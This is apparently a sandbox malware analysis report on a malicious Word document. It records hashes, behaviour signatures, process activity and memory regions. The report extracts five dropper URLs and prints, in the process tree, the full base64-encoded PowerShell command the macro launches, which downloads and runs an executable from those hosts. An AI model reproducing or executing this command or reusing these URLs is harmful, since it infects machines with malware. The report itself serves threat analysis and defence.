Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    26/05/2024, 16:49

General

  • Target

    7623f0cc18f557e80a9f934fab0f2223_JaffaCakes118.doc

  • Size

    311KB

  • MD5

    7623f0cc18f557e80a9f934fab0f2223

  • SHA1

    65d5404df155aa0751fc7dc9ff1ce9490d72e928

  • SHA256

    5d60ff40f922e9d528ac267a9751891267e6d2bdee390e9f48fb2126fd5f01a8

  • SHA512

    c480832d2982c6b81bc111c2667339756fecfb18fc7e09c6be22c56988d1914340d675f97473292bef5bc02133a26b44dccb55ccaeea8dd9ba59c03a8a037668

  • SSDEEP

    6144:dG5/BnVfRFJ7KK9aHScdX9znGUS7Hy7OziB2KiAcD4/:d2n9R/lA5dX9znGUuGbULAC4/

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://balooteabi.com/11FwasoQDp6Byb

exe.dropper

http://bignorthbarbell.com/75AixBQLQ8_DbrdTc

exe.dropper

http://ortotomsk.ru/XmaxodB

exe.dropper

http://bietthunghiduong24h.info/fxTYTjQ4B_X5

exe.dropper

http://91.239.233.236/eRR8zYJVDDEXiR

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 4 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7623f0cc18f557e80a9f934fab0f2223_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1736
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2604
    • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLl.exe
      powersheLl -e JABLADkAXwAzAF8AXwA0AF8APQAoACcAawBfACcAKwAnADAANQA1ADYAJwApADsAJABrADMAXwA0ADQANAA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABEAF8AXwA4ADcAMwA9ACgAJwBoAHQAdAAnACsAJwBwADoALwAnACsAJwAvAGIAYQBsAG8AbwB0AGUAYQBiAGkALgBjAG8AbQAvADEAMQBGACcAKwAnAHcAYQBzAG8AUQBEACcAKwAnAHAAJwArACcANgBCACcAKwAnAHkAYgBAAGgAdAB0AHAAOgAnACsAJwAvACcAKwAnAC8AYgAnACsAJwBpAGcAJwArACcAbgAnACsAJwBvACcAKwAnAHIAdABoAGIAJwArACcAYQByACcAKwAnAGIAZQBsAGwAJwArACcALgBjACcAKwAnAG8AJwArACcAbQAnACsAJwAvADcANQAnACsAJwBBAGkAeABCACcAKwAnAFEATABRADgAXwBEACcAKwAnAGIAJwArACcAcgBkAFQAYwAnACsAJwBAAGgAdAB0AHAAJwArACcAOgAvAC8AbwByAHQAbwB0AG8AbQBzAGsALgByACcAKwAnAHUALwBYACcAKwAnAG0AYQAnACsAJwB4AG8AZABCAEAAaAAnACsAJwB0AHQAcAA6AC8ALwBiACcAKwAnAGkAZQAnACsAJwB0ACcAKwAnAHQAJwArACcAaAB1AG4AJwArACcAZwBoAGkAZAAnACsAJwB1AG8AbgBnADIANABoAC4AaQAnACsAJwBuAGYAbwAnACsAJwAvAGYAeAAnACsAJwBUAFkAJwArACcAVABqAFEAJwArACcANABCAF8AJwArACcAWAA1AEAAJwArACcAaAB0AHQAJwArACcAcAA6AC8ALwAnACsAJwA5ADEALgAnACsAJwAyADMAOQAuADIAJwArACcAMwAzAC4AJwArACcAMgAzADYALwBlAFIAUgAnACsAJwA4AHoAWQAnACsAJwBKAFYARABEAEUAWABpAFIAJwApAC4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQAegBfADEAXwBfADAANwA9ACgAJwBBACcAKwAnADYAMAA3ACcAKwAnADAAMAAyADkAJwApADsAJABoADYANgAxAF8AOAAgAD0AIAAoACcAOAAnACsAJwA1ADgAJwApADsAJAB6ADAAMgAyADMAXwAyAD0AKAAnAFAAMQBfADYANAAnACsAJwA5ACcAKQA7ACQAaABfADcANgAxAF8AMQBfAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABoADYANgAxAF8AOAArACgAJwAuACcAKwAnAGUAeABlACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAG8AMAAzADQAMwBfAF8AIABpAG4AIAAkAEQAXwBfADgANwAzACkAewB0AHIAeQB7ACQAawAzAF8ANAA0ADQALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAbwAwADMANAAzAF8AXwAsACAAJABoAF8ANwA2ADEAXwAxAF8AKQA7ACQASwAwADQAXwA5AF8ANAA4AD0AKAAnAEEANAA5ADAANwAnACsAJwA3ADMANwAnACkAOwBJAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAAJABoAF8ANwA2ADEAXwAxAF8AKQAuAGwAZQBuAGcAdABoACAALQBnAGUAIAA0ADAAMAAwADAAKQAgAHsASQBuAHYAbwBrAGUALQBJAHQAZQBtACAAJABoAF8ANwA2ADEAXwAxAF8AOwAkAHcAXwAyADkANQBfADkAPQAoACcAUQAzACcAKwAnADIAXwA1ADcAJwArACcAMwAnACkAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUwBfAF8AOQAyADEAMgBfAD0AKAAnAGQANwAzACcAKwAnAF8ANQAyAF8AJwApADsA
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2180

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      fe11cad93fbed294b28253fa1349a341

      SHA1

      38d2953ca8e5377a391d0722f6d4a9eb17ede3a2

      SHA256

      09f4f3a61a002ad87896a1c56ff3711fe8dc0d6cc1e3ee84ba23dfa453400432

      SHA512

      82b67044a6a02c0452b2e85eade9d991951f23a7dbc13c818bfe92bdd7adb0d881dd9c30b6fada257f6244e2d06a2e0cd1325913ed4b0b53ee96d65046d36ba1

    • memory/1736-23-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/1736-10-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/1736-6-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/1736-9-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/1736-16-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/1736-40-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/1736-120-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/1736-119-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/1736-62-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/1736-51-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/1736-29-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/1736-117-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/1736-102-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/1736-0-0x000000002F8D1000-0x000000002F8D2000-memory.dmp

      Filesize

      4KB

    • memory/1736-2-0x000000007150D000-0x0000000071518000-memory.dmp

      Filesize

      44KB

    • memory/1736-160-0x000000007150D000-0x0000000071518000-memory.dmp

      Filesize

      44KB

    • memory/1736-17-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/1736-13-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/1736-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1736-15-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/1736-12-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/1736-11-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/1736-14-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/1736-8-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/1736-7-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/1736-143-0x000000007150D000-0x0000000071518000-memory.dmp

      Filesize

      44KB

    • memory/1736-144-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2180-137-0x000000001B7C0000-0x000000001BAA2000-memory.dmp

      Filesize

      2.9MB

    • memory/2180-138-0x0000000001FC0000-0x0000000001FC8000-memory.dmp

      Filesize

      32KB